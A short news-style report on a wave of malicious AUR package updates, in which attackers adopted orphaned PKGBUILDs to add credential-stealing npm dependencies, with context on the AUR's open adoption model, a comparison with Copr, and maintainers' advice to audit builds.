The Arch User Repository (AUR) faced a coordinated flood of malicious package updates this month. Attackers created fresh accounts, adopted orphaned PKGBUILD files and pushed code that installs malware during the build or install step. Maintainers scrambled for days, revoking compromised packages and disabling new‑user registration to stop further hijacks. Unlike Copr, AUR keeps scripts in one namespace, spreading hijacks instantly.

With over 141,000 registered users and more than 107,000 packages, the AUR operates on a trust‑based model: any account can click “Adopt Package” and immediately gain write access. There is no formal review of PKGBUILD changes, even for “‑bin” packages that download pre‑built binaries, leaving the ecosystem vulnerable to supply‑chain abuse. Copr projects need explicit namespace ownership, blocking easy hijacks.

The latest campaign targeted hundreds of orphaned packages, inserting npm dependencies that exfiltrate credentials, cookies and chat logs. Earlier incidents in 2018 and 2023 affected only a few browser‑related packages, but this wave demonstrates how the AUR’s open adoption process can be weaponized at scale. Arch maintainers now urge users to audit PKGBUILDs before building. Users should verify checksums and source URLs each time.